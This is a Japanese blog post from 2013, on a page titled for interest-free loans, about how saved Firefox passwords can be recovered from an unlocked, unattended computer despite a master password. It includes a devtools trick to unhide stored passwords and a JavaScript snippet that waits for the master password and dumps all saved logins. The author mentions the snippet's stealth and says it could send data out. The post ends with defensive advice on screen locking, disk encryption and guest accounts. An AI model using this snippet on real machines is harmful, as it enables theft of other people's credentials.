金利0無利息キャッシング – キャッシングできます

 | 

2013-08-13

Firefoxにマスターパスワードを設定しているユーザーが画面ロック掛けない状態で離席するとどうなるかについて

23:53 | Firefoxにマスターパスワードを設定しているユーザーが画面ロック掛けない状態で離席するとどうなるかについて - 金利0無利息キャッシング – キャッシングできます を含むブックマーク はてなブックマーク - Firefoxにマスターパスワードを設定しているユーザーが画面ロック掛けない状態で離席するとどうなるかについて - 金利0無利息キャッシング – キャッシングできます

Webサイト一個一個訪問して自動フィルインから拾ってくるというのもできるし、重要なサービスのパスワード(メールとか)一個取れれば大体十分なんじゃねーのという気もしないでもないんだけど

マスターパスワード入力後のケース

以下のようにしてパスワードを表示することが出来る

  • 1. chrome://passwordmgr/content/passwordManager.xul を開く
  • 2. Web開発者ツールを開いて document.getElementById("passwordCol").hidden = false;

設定画面で普通に「パスワードを表示する」ボタンを押すとマスターパスワードの再入力を促されるが、chrome://passwordmgr/content/passwordManager.xul をマスターパスワード再入力無しで開けた時点でパスワードは復号化出来ている。単に表示上隠してるに過ぎない。

マスターパスワードの期限が切れてて再度入力が必要なケース

以下のようにして次回マスターパスワードが入力された際に保存されてるパスワード一覧を取得できる。キーロガーとかいらない。

  • 1. chrome://browser/content/ とか開きます (chrome:// なURLだったらなんでもいい)
  • 2. 以下のようなコードをWeb開発者ツールで実行します
  • 3. chrome:// のタブは閉じてしまえば監視コードが仕込まれたことに気付かれないでしょう。
pm = Components.classes["@mozilla.org/login-manager;1"].getService(Components.interfaces.nsILoginManager);
ob = function(){
    if (pm.isLoggedIn){
     var a = Application.activeWindow.tabs[0]._browser.contentWindow;
     var r = pm.getAllLogins().map(function(v){return [v.hostname, v.username, v.password]});
     a.alert(r.join("\n"));
    }
};
timer = Components.classes['@mozilla.org/timer;1'].createInstance(Components.interfaces.nsITimer);
timer.initWithCallback(ob,1000, Components.interfaces.nsITimer.TYPE_REPEATING_SLACK);

マスターパスワードログイン済みになったかどうか監視して、パスワード一覧を取得して表示します。タブ閉じても実行されるように適当なタブのwindow.alertを使ってます。(外部に送ることも当然出来ます)

離席中はどうするべきなのか

  • OSの機能でロックかけろ

マスターパスワードをかけていない状態のFirefox

  • 離席するときにOSの機能でロックをかけていても、Firefoxの場合は key3.dbとsignons.sqlite があればパスワードを復号化出来る。
  • 管理者権限を持つユーザー or パソコン丸ごと盗まれた場合 or リカバリモード、シングルユーザーモード、別OSからマウント等
  • HDD丸ごと暗号化するか、人の恨みを買わないように気をつける

人に貸すときはどうすべきなのか?

ちょっとネット使わせてと言われた場合、自分ならこうします。

  • 自分あるいは信用できる人が監視してる状態ならプライベートブラウジングモードにして貸します。
  • 長時間PCから離れるときはゲスト用アカウントに切り替えた上で貸します
 |